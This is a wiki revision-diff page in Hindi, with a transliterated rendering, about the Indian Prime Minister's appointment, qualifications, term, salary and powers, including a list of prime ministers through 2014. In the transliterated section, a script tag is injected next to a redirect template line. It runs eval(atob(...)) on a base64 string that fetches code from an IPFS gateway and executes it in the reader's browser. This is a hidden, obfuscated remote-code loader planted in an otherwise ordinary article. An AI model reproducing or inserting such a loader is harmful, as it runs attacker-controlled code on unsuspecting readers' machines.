Difference between revisions of "प्रधानमंत्री"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(35 intermediate revisions by 5 users not shown)
Line 1: Line 1:
 +
[[चित्र:Prime-Minister's -Rights.jpg|thumb|500px|प्रधानमंत्री शक्ति केंद्रीकरण]]
 +
[[भारत का संविधान|भारतीय संविधान]] के अनुसार प्रधानमंत्री का पद बहुत ही महत्त्वपूर्ण पद है, क्योंकि प्रधानमंत्री ही संघ कार्यपालिका का प्रमुख होता है। चूंकि [[भारत]] में [[ब्रिटेन]] के समान संसदीय शासन व्यवस्था कों अंगीकार किया गया है, इसलिए प्रधानमंत्री पद का महत्त्व और अधिक हो गया है। अनुच्छेद 74 के अनुसार प्रधानमंत्री मंत्रिपरिषद का प्रधान होता है। वह [[राष्ट्रपति]] के कृत्यों का संचालन करता है।
 +
{{seealso|उप प्रधानमंत्री|कार्यवाहक प्रधानमंत्री}}
 +
==चयन तथा नियुक्ति==
 
{{tocright}}
 
{{tocright}}
भारतीय संविधान के अनुसार प्रधानमंत्री का पद बहुत ही महत्वपूर्ण पद है, क्योंकि प्रधानमंत्री ही संघ कार्यपालिका का प्रमुख होता है। चूंकि [[भारत]] में [[ब्रिटेन]] के समान संसदीय शासन व्यवस्था कों अंगीकार किया गया है, इसलिए प्रधानमंत्री पद का महत्व और अधिक हो गया है। अनुच्छेद 74 के अनुसार प्रधानमंत्री मंत्रिपरिषद का प्रधान होता है। वह [[राष्ट्रपति]] के कृत्यों का संचालन करता है।
+
प्रधानमंत्री के चयन तथा नियुक्ति के सम्बन्ध में संविधान के अनुच्छेद 75 में केवल यह प्रावधान किया गया है कि प्रधानमंत्री की नियुक्ति राष्ट्रपति करेगा। लेकिन इसका तात्पर्य यह नहीं है कि राष्ट्रपति अपने विवेकाधिकार से प्रधानमंत्री की नियुक्ति कर सकता है। सामान्य प्रथा यह है कि राष्ट्रपति उसी व्यक्ति को प्रधानमंत्री के पद पर नियुक्त कर सकता है जो [[लोकसभा]] में बहुमत प्राप्त दल का नेता होता है। जो व्यक्ति लोकसभा में बहुमत प्राप्त दल का नेता चुना जाता है, वह राष्ट्रपति से मिलकर सरकार बनाने का दावा करता है। इसके बाद उस व्यक्ति को प्रधानमंत्री के पद पर नियुक्त किया जाता है। यदि सामान्य चुनाव में कोई भी दल बहुमत नहीं प्राप्त करता, तो राष्ट्रपति लोकसभा में सबसे बड़े दल के नेता को या किसी ऐसे व्यक्ति को, जिसे कई दलों का समर्थन प्राप्त हो, को प्रधानमंत्री के पद पर नियुक्त करके उससे यह अपेक्षा करता है कि वह एक मास के अंतर्गत लोकसभा में अपना बहुमत साबित करे। उदाहरणार्थ [[1979]] में [[चरण सिंह चौधरी|चरण सिंह]], जिन्हें कई दलों ने समर्थन दिया था, तथा [[1989]] में [[वी. पी. सिंह]] राष्ट्रपति के द्वारा प्रधानमंत्री नियुक्त किये गये थे। इसी प्रकार 1991 में जब लोकसभा के सामान्य चुनाव (मध्यावधि) में किसी भी दल को स्पष्ट बहुमत नहीं मिला था, तब लोकसभा में सबसे बड़े देल के नेता [[पी. वी. नरसिंहराव]] को राष्ट्रपति ने प्रधानमंत्री के पद पर नियुक्त किया था। यही स्थिति 11वीं लोकसभा और फिर [[1998]] में गठित 12वीं लोकसभा में भी देखने को मिली, जब राष्ट्रपति ने लोकसभा चुनाव में किसी दल अथवा गठबंधन के बहुमत नहीं मिलने के कारण सबसे बड़ा एवं बड़े गठबंधन के नेता [[अटल बिहारी वाजपेयी]] को प्रधानमंत्री नियुक्त किया।  
==चयन तथा नियुक्ति==
 
प्रधानमंत्री के चयन तथा नियुक्ति के सम्बन्ध में संविधान के अनुच्छेद 75 में केवल यह प्रावधान किया गया है कि प्रधानमंत्री की नियुक्ति राष्ट्रपति करेगा। लेकिन इसका तात्पर्य यह नहीं है कि राष्ट्रपति अपने विवेकाधिकार से प्रधानमंत्री की नियुक्ति कर सकता है। सामान्य प्रथा यह है कि राष्ट्रपति उसी व्यक्ति को प्रधानमंत्री के पद पर नियुक्त कर सकता है जो [[लोकसभा]] में बहुमत प्राप्त दल का नेता होता है। जो व्यक्ति लोकसभा में बहुमत प्राप्त दल का नेता चुना जाता है, वह राष्ट्रपति से मिलकर सरकार बनाने का दावा करता है। इसके बाद उस व्यक्ति को प्रधानमंत्री के पद पर नियुक्त किया जाता है। यदि सामान्य चुनाव में कोई भी दल बहुमत नहीं प्राप्त करता, तो राष्ट्रपति लोकसभा में सबसे बड़े दल के नेता को या किसी ऐसे व्यक्ति को, जिसे कई दलों का समर्थन प्राप्त हो, को प्रधानमंत्री के पद पर नियुक्त करके उससे यह अपेक्षा करता है कि वह एक मास के अंतर्गत लोकसभा में अपना बहुमत साबित करे। उदाहरणार्थ [[1979]] में चरण सिंह, जिन्हें कई दलों ने समर्थन दिया था, तथा [[1989]] में वी. पी. सिंह राष्ट्रपति के द्वारा प्रधानमंत्री नियुक्त किये गये थे। इसी प्रकार 1991 में जब लोकसभा के सामान्य चुनाव (मध्यावधि) में किसी भी दल को स्पष्ट बहुमत नहीं मिला था, तब लोकसभा में सबसे बड़े देल के नेता [[पी. वी. नरसिंहराव]] को राष्ट्रपति ने प्रधानमंत्री के पद पर नियुक्त किया था। यही स्थिति 11वीं लोकसभा और फिर [[1998]] में गठित 12वीं लोकसभा में भी देखने को मिली, जब राष्ट्रपति ने लोकसभा चुनाव में किसी दल अथवा गठबंधन के बहुमत नहीं मिलने के कारण सबसे बड़ा एवं बड़े गठबंधन के नेता [[अटल बिहारी वाजपेयी]] को प्रधानमंत्री नियुक्त किया।  
 
  
 
जब कार्यरत [[मंत्रिपरिषद]] के विरुद्ध लोकसभा में अविश्वास प्रस्ताव पारित हो जाता है, तो मंत्रिपरिषद को त्यागपत्र देना पड़ता है। ऐसी स्थिति में राष्ट्रपति लोकसभा में विपक्ष के नेता को सरकार बनाने के लिए आमंत्रित करता है, लेकिन उसके इन्कार करने पर उस व्यक्ति को, जिसे कई दलों का समर्थन प्राप्त हो, सरकार बनाने के लिए आमंत्रित करता है और उन्हें निर्देश देता है कि सरकार के गठन के पश्चात् एक मास के अंतर्गत अपना बहुमत सिद्ध करे। [[1979]] में तत्कालीन प्रधानमंत्री [[मोरारजी देसाई]] के त्यागपत्र के बाद राष्ट्रपति ने लोकसभा में विपक्ष के नेता वाई. बी. चाव्हाण को सरकार बनाने के लिए आमंत्रित किया था, लेकिन उनके इन्कार करने पर कई दलों से समर्थन प्राप्त करने वाले चरण सिंह को सरकार बनाने के लिए आमंत्रित किया गया था।
 
जब कार्यरत [[मंत्रिपरिषद]] के विरुद्ध लोकसभा में अविश्वास प्रस्ताव पारित हो जाता है, तो मंत्रिपरिषद को त्यागपत्र देना पड़ता है। ऐसी स्थिति में राष्ट्रपति लोकसभा में विपक्ष के नेता को सरकार बनाने के लिए आमंत्रित करता है, लेकिन उसके इन्कार करने पर उस व्यक्ति को, जिसे कई दलों का समर्थन प्राप्त हो, सरकार बनाने के लिए आमंत्रित करता है और उन्हें निर्देश देता है कि सरकार के गठन के पश्चात् एक मास के अंतर्गत अपना बहुमत सिद्ध करे। [[1979]] में तत्कालीन प्रधानमंत्री [[मोरारजी देसाई]] के त्यागपत्र के बाद राष्ट्रपति ने लोकसभा में विपक्ष के नेता वाई. बी. चाव्हाण को सरकार बनाने के लिए आमंत्रित किया था, लेकिन उनके इन्कार करने पर कई दलों से समर्थन प्राप्त करने वाले चरण सिंह को सरकार बनाने के लिए आमंत्रित किया गया था।
 
==प्रधानमंत्री पद की योग्यता==
 
==प्रधानमंत्री पद की योग्यता==
 +
 
प्रधानमंत्री की योग्यता के सम्बन्ध में संविधान में कोई स्पष्ट प्रावधान नहीं किया गया है, लेकिन इतना अवश्य कहा गया है कि प्रधानमंत्री लोकसभा में बहुमत प्राप्त दल का नेता होगा। लोकसभा में बहुमत प्राप्त दल का नेता होने के लिए आवश्यक है कि नेता लोकसभा का सदस्य हो। इसलिए प्रधानमंत्री को साधारणत: लोकसभा का सदस्य होने की योग्यता रखनी चाहिए। यदि कोई व्यक्ति, जो कि लोकसभा का सदस्य नहीं है, प्रधानमंत्री के पद पर नियुक्त किया जाता है तो उसे छ: मास के अंतर्गत लोकसभा का सदस्य होना पड़ता है। उदाहरणार्थ, [[1967]] में [[इंदिरा गांधी]] (तत्समय राज्यसभा की सदस्य थी) तथा [[1991]] में जब पी. वी. नरसिंहराव प्रधानमंत्री पद पर नियुक्त किये गये, तब वे लोकसभा के सदस्य नहीं थे, लेकिन उन्होंने 6 मास के अंतर्गत लोकसभा का चुनाव लड़कर संसद की सदस्यता प्राप्त की थी। प्रधानमंत्री के लिए लोकसभा की सदस्यता अनिवार्य नहीं है। उसे वस्तुत: संसद के दोनों सदनों में से किसी एक सदन अर्थात् लोकसभा या [[राज्यसभा]] का सदस्य अनिवार्यत: होना चाहिए। [[1997]] में प्रधानमंत्री पद पर नियुक्त [[इन्द्र कुमार गुजराल]] तथा बाद में [[2004]] में नियुक्त प्रधानमंत्री [[डॉ. मनमोहन सिंह]] राज्यसभा के सदस्य रहे हैं।  
 
प्रधानमंत्री की योग्यता के सम्बन्ध में संविधान में कोई स्पष्ट प्रावधान नहीं किया गया है, लेकिन इतना अवश्य कहा गया है कि प्रधानमंत्री लोकसभा में बहुमत प्राप्त दल का नेता होगा। लोकसभा में बहुमत प्राप्त दल का नेता होने के लिए आवश्यक है कि नेता लोकसभा का सदस्य हो। इसलिए प्रधानमंत्री को साधारणत: लोकसभा का सदस्य होने की योग्यता रखनी चाहिए। यदि कोई व्यक्ति, जो कि लोकसभा का सदस्य नहीं है, प्रधानमंत्री के पद पर नियुक्त किया जाता है तो उसे छ: मास के अंतर्गत लोकसभा का सदस्य होना पड़ता है। उदाहरणार्थ, [[1967]] में [[इंदिरा गांधी]] (तत्समय राज्यसभा की सदस्य थी) तथा [[1991]] में जब पी. वी. नरसिंहराव प्रधानमंत्री पद पर नियुक्त किये गये, तब वे लोकसभा के सदस्य नहीं थे, लेकिन उन्होंने 6 मास के अंतर्गत लोकसभा का चुनाव लड़कर संसद की सदस्यता प्राप्त की थी। प्रधानमंत्री के लिए लोकसभा की सदस्यता अनिवार्य नहीं है। उसे वस्तुत: संसद के दोनों सदनों में से किसी एक सदन अर्थात् लोकसभा या [[राज्यसभा]] का सदस्य अनिवार्यत: होना चाहिए। [[1997]] में प्रधानमंत्री पद पर नियुक्त [[इन्द्र कुमार गुजराल]] तथा बाद में [[2004]] में नियुक्त प्रधानमंत्री [[डॉ. मनमोहन सिंह]] राज्यसभा के सदस्य रहे हैं।  
 +
{| class="bharattable-purple" border="1" width=100%
 +
|+भारत के प्रधानमंत्री एवं कार्यकाल
 +
|-
 +
! क्रमांक
 +
! नाम
 +
! कार्यकाल
 +
! चित्र
 +
|-
 +
| (1)
 +
| [[जवाहर लाल नेहरू]]
 +
| [[26 फ़रवरी]], [[1950]] से [[27 मई]], [[1964]]
 +
| [[चित्र:Jawahar-Lal-Nehru.jpg|जवाहर लाल नेहरू|50px|link=जवाहर लाल नेहरू]]
 +
|-
 +
|
 +
| [[गुलज़ारी लाल नन्दा]] <br />
 +
(कार्यवाहक)
 +
| [[27 मई]], [[1964]] से [[9 जून]], [[1964]]
 +
| [[चित्र:Gulzarilal-Nanda.jpg|गुलज़ारी लाल नन्दा|50px|link=गुलज़ारी लाल नन्दा]]
 +
|-
 +
| (2)
 +
| [[लाल बहादुर शास्त्री]]
 +
| [[9 जून]], [[1964]] से [[11 जनवरी]], [[1966]]
 +
| [[चित्र:Lal-Bahadur-Shastri.jpg|लाल बहादुर शास्त्री|50px|link=लाल बहादुर शास्त्री]]
 +
|-
 +
|
 +
| [[गुलज़ारी लाल नन्दा]] <br />
 +
(कार्यवाहक)
 +
| [[11 जनवरी]], [[1966]] से [[24 जनवरी]] [[1966]]
 +
| [[चित्र:Gulzarilal-Nanda.jpg|गुलज़ारी लाल नन्दा|50px|link=गुलज़ारी लाल नन्दा]]
 +
|-
 +
| (3)
 +
| [[इंदिरा गांधी|श्रीमती इंदिरा गांधी]] 
 +
| [[24 जनवरी]], [[1966]] से [[24 मार्च]], [[1977]]
 +
| [[चित्र:Indira-Gandhi.jpg|इंदिरा गांधी|50px|link=इंदिरा गांधी]]
 +
|-
 +
| (4)
 +
| [[मोरारजी देसाई]]
 +
| [[24 मार्च]], [[1977]] से [[28 जुलाई]], [[1979]]
 +
| [[चित्र:Morarji Desai.jpg|मोरारजी देसाई|50px|link=मोरारजी देसाई]]
 +
|-
 +
| (5)
 +
| [[चरण सिंह चौधरी]]
 +
| [[28 जुलाई]], [[1979]] से [[14 जनवरी]], [[1980]]
 +
| [[चित्र:Chaudhary-Charan-Singh.jpg|चरण सिंह चौधरी|50px|link=चरण सिंह चौधरी]]
 +
|-
 +
|
 +
| [[इंदिरा गांधी|श्रीमती इंदिरा गांधी]]
 +
| [[14 जनवरी]], [[1980]] से [[31 अक्टूबर]], [[1984]]
 +
| [[चित्र:Indira-Gandhi.jpg|इंदिरा गांधी|50px|link=इंदिरा गांधी]]
 +
|-
 +
| (6)
 +
| [[राजीव गांधी]]
 +
| [[31 अक्टूबर]], [[1984]] से [[1 दिसम्बर]], [[1989]]
 +
| [[चित्र:Rajiv-Gandhi.jpg|राजीव गांधी|50px|link=राजीव गांधी]]
 +
|-
 +
| (7)
 +
| [[विश्वनाथ प्रताप सिंह]]
 +
| [[1 दिसम्बर]], [[1989]] से [[10 नवम्बर]], [[1990]]
 +
| [[चित्र:V-P-Singh.jpg|विश्वनाथ प्रताप सिंह|50px|link=विश्वनाथ प्रताप सिंह]]
 +
|-
 +
| (8)
 +
| [[चन्द्रशेखर|चन्द्रशेखर सिंह]]
 +
| [[10 नवम्बर]], [[1990]] से [[21 जून]], [[1991]]
 +
| [[चित्र:Chandra-Shekhar-Singh-2.jpg|चन्द्रशेखर सिंह|50px|link=चन्द्रशेखर सिंह]]
 +
|-
 +
| (9)
 +
| [[पी. वी. नरसिंह राव]]
 +
| [[21 जून]], [[1991]] से [[16 मई]], [[1996]]
 +
| [[चित्र:Narsing-Rao.jpg|पी. वी. नरसिंह राव|50px|link=नरसिंह राव पी. वी.]]
 +
|-
 +
| (10)
 +
| [[अटल बिहारी वाजपेयी]]
 +
| [[16 मई]], [[1996]] से [[1 जून]], [[1996]]
 +
| [[चित्र:Atal-Bihari-Vajpayee.jpg|अटल बिहारी वाजपेयी|50px|link=अटल बिहारी वाजपेयी]]
 +
|-
 +
| (11)
 +
| [[एच. डी. देवगौड़ा]]
 +
| [[1 जून]], [[1996]] से [[21 अप्रैल]], [[1997]]
 +
| [[चित्र:HD Deve-Gowda.jpg|एच. डी. देवगौड़ा|50px|link=एच. डी. देवगौड़ा]]
 +
|-
 +
| (12)
 +
| [[इन्द्र कुमार गुजराल]]
 +
| [[21 अप्रैल]], [[1997]] से [[19 मार्च]], [[1998]]
 +
| [[चित्र:Inder-Kumar-Gujral.jpg|इन्द्र कुमार गुजराल|50px|link=इन्द्र कुमार गुजराल]]
 +
|-
 +
|
 +
| [[अटल बिहारी वाजपेयी]] 
 +
| [[19 मार्च]], [[1998]] से [[22 मई]], [[2004]]
 +
| [[चित्र:Atal-Bihari-Vajpayee.jpg|अटल बिहारी वाजपेयी|50px|link=अटल बिहारी वाजपेयी]]
 +
|-
 +
| (13)
 +
| [[डॉ. मनमोहन सिंह]]
 +
| [[22 मई]], [[2004]] से [[26 मई]], [[2014]]
 +
| [[चित्र:Manmohan-Singh.jpg|डॉ. मनमोहन सिंह|50px|link=मनमोहन सिंह]]
 +
|-
 +
| (14)
 +
| [[नरेन्द्र मोदी]]
 +
| [[26 मई]], [[2014]] से अब तक
 +
| [[चित्र:Narendra-Modi.jpg|नरेन्द्र मोदी|50px|link=नरेन्द्र मोदी]]
 +
|}
 +
संसद के किसी सदन का सदस्य न होने पर भी कोई व्यक्ति प्रधानमंत्री पद पर नियुक्त हो सकता है। अनुच्छेद 75 (5) के अनुसार यदि कोई व्यक्ति छ: माह के अन्दर संसद के किसी सदन का सदस्य नहीं बन जाता है, तो वह प्रधानमंत्री पद पर बने नहीं रह सकता है। इसका अर्थ है कि बाहरी व्यक्ति भी प्रधानमंत्री पद पर नियुक्त हो सकता है। लेकिन उसे छ: महीने के भीतर संसद के किसी सदन का सदस्य बन जाना चाहिए। यदि वह इस अवधि के भीतर संसद के किसी सदन का सदस्य नहीं बन पाता है तो उसे अपने पद से इस्तीफ़ा दे देना पड़ेगा। ध्यातव्य है कि [[1996]] में जब [[एच. डी. देवगौड़ा]] प्रधानमंत्री नियुक्त हुए थे तब वे किसी भी सदन के सदस्य नहीं थे। उनकी नियुक्ति को एस. पी. आनन्द ने इस आधार पर न्यायालय में चुनौती दी थी कि इससे अनुच्छेद 14, 21 और 75 का उल्लंघन होता है। लेकिन सर्वोच्च न्यायालय ने इस मामले पर अपना निर्णय सुनाते हुए कहा कि अनुच्छेद 75 (5) के अनुसार यह नियुक्ति विधिमान्य है।<ref>इन प्रधानमंत्रियों में से 3 प्रधानमंत्री, [[जवाहरलाल नेहरू|पंडित जवाहर लाल नेहरू]], [[लाल बहादुर शास्त्री]] तथा [[इंदिरा गांधी|श्रीमती इंदिरा गांधी]] की मृत्यु उनके कार्यकाल के ही दौरान हुई थी। जवाहर लाल नेहरू तथा लाल बहादुर शास्त्री की मृत्यु के बाद दो बार [[गुलज़ारीलाल नन्दा]] ने [[कार्यवाहक प्रधानमंत्री]] के रूप में कार्य किया था। [[चौधरी चरण सिंह|चरण सिंह]] तथा [[अटल बिहारी वाजपेयी]] ऐसे प्रधानमंत्री थे, जिन्होंने लोकसभा में विश्वास मत प्राप्त करने के पहले ही त्यागपत्र दे दिया था। जबकि [[विश्वनाथ प्रताप सिंह]] तथा [[एच. डी. देवगौड़ा]] ऐसे प्रधानमंत्री हैं, जिन्होंने लोकसभा में विश्वास मत प्राप्त करने में असफल रहने के कारण त्याग पत्र दे दिया था।
 +
*[[जवाहर लाल नेहरू]], [[इंदिरा गांधी]] तथा अटल बिहारी वाजपेयी के बाद [[मनमोहन सिंह|डॉ. मनमोहन सिंह]] चौथे प्रधानमंत्री हैं, जो लगातार दूसरी बार इस पद पर आसीन हुए हैं। </ref>
  
संसद के किसी सदन का सदस्य न होने पर भी कोई व्यक्ति प्रधानमंत्री पद पर नियुक्त हो सकता है। अनुच्छेद 75 (5) के अनुसार यदि कोई व्यक्ति छ: माह के अन्दर संसद के किसी सदन का सदस्य नहीं बन जाता है, तो वह प्रधानमंत्री पद पर बने नहीं रह सकता है। इसका अर्थ है कि बाहरी व्यक्ति भी प्रधानमंत्री पद पर नियुक्त हो सकता है। लेकिन उसे छ: महीने के भीतर संसद के किसी सदन का सदस्य बन जाना चाहिए। यदि वह इस अवधि के भीतर संसद के किसी सदन का सदस्य नहीं बन पाता है तो उसे अपने पद से इस्तीफ़ा दे देना पड़ेगा। ध्यातव्य है कि [[1996]] में जब [[एच. डी. देवगौड़ा]] प्रधानमंत्री नियुक्त हुए थे तब वे किसी भी सदन के सदस्य नहीं थे। उनकी नियुक्ति को एस. पी. आनन्द ने इस आधार पर न्यायालय में चुनौती दी थी कि इससे अनुच्छेद 14, 21 और 75 का उल्लंघन होता है। लेकिन सर्वोच्च न्यायालय ने इस मामले पर अपना निर्णय सुनाते हुए कहा कि अनुच्छेद 75 (5) के अनुसार यह नियुक्ति विधिमान्य है।<ref>*इन प्रधानमंत्रियों में से 3 प्रधानमंत्री, पंडित जवाहर लाल नेहरू, लाल बहादुर शास्त्री तथा श्रीमती इंदिरा गांधी की मृत्यु उनके कार्यकाल के ही दौरान हुई थी। जवाहर लाल नेहरू तथा लाल बहादुर शास्त्री की मृत्यु के बाद दो बार गुलजारी लाल नन्दा ने कार्यवाहक प्रधानमंत्री के रूप में कार्य किया था। चरण सिंह तथा अटल बिहारी वाजपेयी ऐसे प्रधानमंत्री थे, जिन्होंने लोकसभा में विश्वास मत प्राप्त करने के पहले ही त्यागपत्र दे दिया था। जबकि विश्वनाथ प्रताप सिंह तथा एच. डी. देवगौड़ा ऐसे प्रधानमंत्री हैं, जिन्होंने लोकसभा में विश्वास मत प्राप्त करने में असफल रहने के कारण त्याग पत्र दे दिया था।
+
==पदावधि==
*[[जवाहर लाल नेहरू]], इंदिरा गांधी तथा अटल बिहारी वाजपेयी के बाद डॉ. मनमोहन सिंह चौथे प्रधानमंत्री हैं, जो लगातार दूसरी बार इस पद पर आसीन हुए हैं। </ref>
 
==पदाविधि==
 
 
सामान्यतया प्रधानमंत्री अपने पद ग्रहण की तिथि से लोकसभा के अगले चुनाव के बाद मंत्रिमण्डल के गठन तक प्रधानमंत्री पद पर बना रह सकता है, लेकिन इसके पहले भी वह  
 
सामान्यतया प्रधानमंत्री अपने पद ग्रहण की तिथि से लोकसभा के अगले चुनाव के बाद मंत्रिमण्डल के गठन तक प्रधानमंत्री पद पर बना रह सकता है, लेकिन इसके पहले भी वह  
 
#राष्ट्रपति को त्यागपत्र देकर पदमुक्त हो सकता है, या  
 
#राष्ट्रपति को त्यागपत्र देकर पदमुक्त हो सकता है, या  
 
#लोकसभा में अविश्वास प्रस्ताव पारित होने के कारण पद त्याग करता है, या  
 
#लोकसभा में अविश्वास प्रस्ताव पारित होने के कारण पद त्याग करता है, या  
#राष्ट्रपति के द्वारा बर्ख़ास्त किया जा सकता है।  
+
#राष्ट्रपति के द्वारा बर्ख़ास्त किया जा सकता है।
 +
 
 
==वेतन एवं भत्ते==
 
==वेतन एवं भत्ते==
प्रधानमंत्री को प्रतिमाह 2,250 रुपये वेतन के रूप में मिलता है। साथ ही उन्हें मुफ्त आवास, यात्रा, चिकित्सा, टेलीफोन आदि की सुविधाएँ करायी जाती हैं। भत्ते के रूप में प्रधानमंत्री को निर्वाचन क्षेत्र, आकस्मिक ख़र्च, अन्य ख़र्चे एवं डी.ए. आदि दिया जाता है।  
+
प्रधानमंत्री को प्रतिमाह '''1 लाख 25 हज़ार''' रुपये वेतन के रूप में मिलते हैं। साथ ही उन्हें मुफ़्त आवास, यात्रा, चिकित्सा, टेलीफ़ोन आदि की सुविधाएँ करायी जाती हैं। भत्ते के रूप में प्रधानमंत्री को निर्वाचन क्षेत्र, आकस्मिक ख़र्च, अन्य ख़र्चे एवं डी.ए. आदि दिया जाता है।
 +
 
 
==अधिकार एवं कार्य==
 
==अधिकार एवं कार्य==
 
प्रधानमंत्री के निम्नलिखित कार्य एवं अधिकार हैं–
 
प्रधानमंत्री के निम्नलिखित कार्य एवं अधिकार हैं–
 
#प्रधानमंत्री अपने मंत्रिमण्डल के अन्य सदस्यों को नियुक्त करने, मंत्रिमण्डल से बर्ख़ास्त करने तथा मंत्रिमण्डल से उनके त्यागपत्र को स्वीकार करने की सिफ़ारिश राष्ट्रपति से करता है (अनुच्छेद 75 (1))।
 
#प्रधानमंत्री अपने मंत्रिमण्डल के अन्य सदस्यों को नियुक्त करने, मंत्रिमण्डल से बर्ख़ास्त करने तथा मंत्रिमण्डल से उनके त्यागपत्र को स्वीकार करने की सिफ़ारिश राष्ट्रपति से करता है (अनुच्छेद 75 (1))।
 
#वह अपने मंत्रिमण्डल के सदस्यों को विभाग का आबंटन कर सकता है तथा किसी मंत्री को एक विभाग से दूसरे विभाग में अन्तरित कर सकता है।
 
#वह अपने मंत्रिमण्डल के सदस्यों को विभाग का आबंटन कर सकता है तथा किसी मंत्री को एक विभाग से दूसरे विभाग में अन्तरित कर सकता है।
#प्रधानमंत्री मंत्रिमण्डल का प्रधान होता है और उसकी मृत्यु या त्यागपत्र से मंत्रिमण्डल का विघटन हो जाता है (अनुच्छेद 74 (1))।
+
#प्रधानमंत्री मंत्रिमण्डल का प्रधान होता है और उसकी मृत्यु या त्यागपत्र से मंत्रिमण्डल का विघटन हो जाता है<ref>(अनुच्छेद 74 (1))</ref>
 
#प्रधानमंत्री का यह कर्तव्य है कि वह संघ के कार्यकलाप के प्रशासन सम्बन्धी और विधान विषयक की सूचना राष्ट्रपति को दे और यदि राष्ट्रपति किसी ऐसे विषय पर प्रधानमंत्री से सूचना मांगता है, तो प्रधानमंत्री राष्ट्रपति को सूचना देने के लिए बाध्य है (अनुच्छेद 78)।
 
#प्रधानमंत्री का यह कर्तव्य है कि वह संघ के कार्यकलाप के प्रशासन सम्बन्धी और विधान विषयक की सूचना राष्ट्रपति को दे और यदि राष्ट्रपति किसी ऐसे विषय पर प्रधानमंत्री से सूचना मांगता है, तो प्रधानमंत्री राष्ट्रपति को सूचना देने के लिए बाध्य है (अनुच्छेद 78)।
 
#प्रधानमंत्री मंत्रिमण्डल की बैठक की अध्यक्षता करता है।  
 
#प्रधानमंत्री मंत्रिमण्डल की बैठक की अध्यक्षता करता है।  
 
#यदि राष्ट्रपति चाहता है कि किसी बात पर मंत्रिपरिषद विचार करे तो वह प्रधानमंत्री को संसूचना देता है।  
 
#यदि राष्ट्रपति चाहता है कि किसी बात पर मंत्रिपरिषद विचार करे तो वह प्रधानमंत्री को संसूचना देता है।  
==उप-प्रधानमंत्री== 
+
 
 +
==उप-प्रधानमंत्री==
 
{{main|उप प्रधानमंत्री}}
 
{{main|उप प्रधानमंत्री}}
भारतीय संविधान में उप-प्रधानमंत्री पद की कोई व्यवस्था नहीं है। इसके बावजूद समय-समय पर इस पद की व्यवस्था की जाती रही है। इस पद का अब तक 7 बार सृजन किया गया है। पहली बार इस पद का सृजन प्रथम लोकसभा के दौरान प्रधानमंत्री जवाहर लाल नेहरू द्वारा किया गया था। इस प्रकार सरदार बल्लभ भाई पटेल उप-प्रधानमंत्री पद को सुशोभित करने वाले प्रथम व्यक्ति थे।
+
[[भारतीय संविधान]] में उप-प्रधानमंत्री पद की कोई व्यवस्था नहीं है। इसके बावजूद समय-समय पर इस पद की व्यवस्था की जाती रही है। इस पद का अब तक 7 बार सृजन किया गया है। पहली बार इस पद का सृजन प्रथम [[लोकसभा]] के दौरान प्रधानमंत्री जवाहर लाल नेहरू द्वारा किया गया था। इस प्रकार [[सरदार बल्लभ भाई पटेल]] उप-प्रधानमंत्री पद को सुशोभित करने वाले प्रथम व्यक्ति थे।
  
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
|प्रारम्भिक=प्रारम्भिक1
+
|प्रारम्भिक=प्रारम्भिक3
 
|माध्यमिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|पूर्णता=
Line 39: Line 145:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:नया पन्ना]]
+
 
 +
==संबंधित लेख==
 +
{{भारत के प्रधानमंत्री}}
 +
{{भारत के प्रधानमंत्री2}}
 +
[[Category:कार्यपालिका]]
 +
[[Category:मन्त्रिमण्डल]]
 
__INDEX__
 
__INDEX__

Latest revision as of 15:01, 26 May 2014

thumb|500px|pradhanamantri shakti keandrikaran bharatiy sanvidhan ke anusar pradhanamantri ka pad bahut hi mahattvapoorn pad hai, kyoanki pradhanamantri hi sangh karyapalika ka pramukh hota hai. chooanki bharat mean briten ke saman sansadiy shasan vyavastha koan aangikar kiya gaya hai, isalie pradhanamantri pad ka mahattv aur adhik ho gaya hai. anuchchhed 74 ke anusar pradhanamantri mantriparishad ka pradhan hota hai. vah rashtrapati ke krityoan ka sanchalan karata hai.

  1. REDIRECTsaancha:inhean bhi dekhean<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

chayan tatha niyukti

pradhanamantri ke chayan tatha niyukti ke sambandh mean sanvidhan ke anuchchhed 75 mean keval yah pravadhan kiya gaya hai ki pradhanamantri ki niyukti rashtrapati karega. lekin isaka tatpary yah nahian hai ki rashtrapati apane vivekadhikar se pradhanamantri ki niyukti kar sakata hai. samany pratha yah hai ki rashtrapati usi vyakti ko pradhanamantri ke pad par niyukt kar sakata hai jo lokasabha mean bahumat prapt dal ka neta hota hai. jo vyakti lokasabha mean bahumat prapt dal ka neta chuna jata hai, vah rashtrapati se milakar sarakar banane ka dava karata hai. isake bad us vyakti ko pradhanamantri ke pad par niyukt kiya jata hai. yadi samany chunav mean koee bhi dal bahumat nahian prapt karata, to rashtrapati lokasabha mean sabase b de dal ke neta ko ya kisi aise vyakti ko, jise kee daloan ka samarthan prapt ho, ko pradhanamantri ke pad par niyukt karake usase yah apeksha karata hai ki vah ek mas ke aantargat lokasabha mean apana bahumat sabit kare. udaharanarth 1979 mean charan sianh, jinhean kee daloan ne samarthan diya tha, tatha 1989 mean vi. pi. sianh rashtrapati ke dvara pradhanamantri niyukt kiye gaye the. isi prakar 1991 mean jab lokasabha ke samany chunav (madhyavadhi) mean kisi bhi dal ko spasht bahumat nahian mila tha, tab lokasabha mean sabase b de del ke neta pi. vi. narasianharav ko rashtrapati ne pradhanamantri ke pad par niyukt kiya tha. yahi sthiti 11vian lokasabha aur phir 1998 mean gathit 12vian lokasabha mean bhi dekhane ko mili, jab rashtrapati ne lokasabha chunav mean kisi dal athava gathabandhan ke bahumat nahian milane ke karan sabase b da evan b de gathabandhan ke neta atal bihari vajapeyi ko pradhanamantri niyukt kiya.

